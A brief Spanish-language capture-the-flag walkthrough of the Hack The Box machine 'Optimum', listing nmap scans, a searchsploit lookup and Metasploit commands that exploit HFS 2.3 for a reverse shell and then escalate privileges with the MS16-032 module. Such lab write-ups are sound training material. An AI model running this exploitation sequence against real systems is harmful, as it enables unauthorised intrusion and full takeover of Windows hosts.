Optimum

✍️ Autor: ch4p 🔍 Dificultad: Fácil 📅 Fecha de creación: 3/10/2017

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 10.10.10.8

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sC -sV 10.10.10.8

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Durante el escaneo se identificaron los siguientes puertos abiertos:

  • Puerto 80 (HTTP): Este puerto generalmente está asociado a servidores web. Si el servicio está ejecutando un servidor web como Apache, Nginx o IIS, es recomendable buscar vulnerabilidades conocidas relacionadas con el software y versiones en uso (por ejemplo, a través de CVEs). Además, es importante realizar pruebas de seguridad en las aplicaciones web que se ejecutan en el servidor, como inyecciones SQL, Cross-Site Scripting (XSS) o vulnerabilidades de escalada de privilegios.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p80 -v 10.10.10.8

para que nos proporcione más información sobre esos puertos específicamente.

Buscamos exploits sobre esa versión.

searchsploit HFS 2.3

🚀 EXPLOTACIÓN

Explotamos a través de Metasploit.

use windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set LHOST 10.10.14.7
run
background

Estamos dentro del Usuario Kostas por lo que podemos conseguir la flag del user. Buscamos a través de Metasploit que exploit nos recomienda.

🔐 PRIVILEGIOS

use multi/recon/local_exploit_suggerster

Descubrimos uno que nos llama la atención para explotarlo.

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set LHOST 10.10.14.7 
set session 1  
exploit
getuid

Ya somos root.

Last updated

Was this helpful?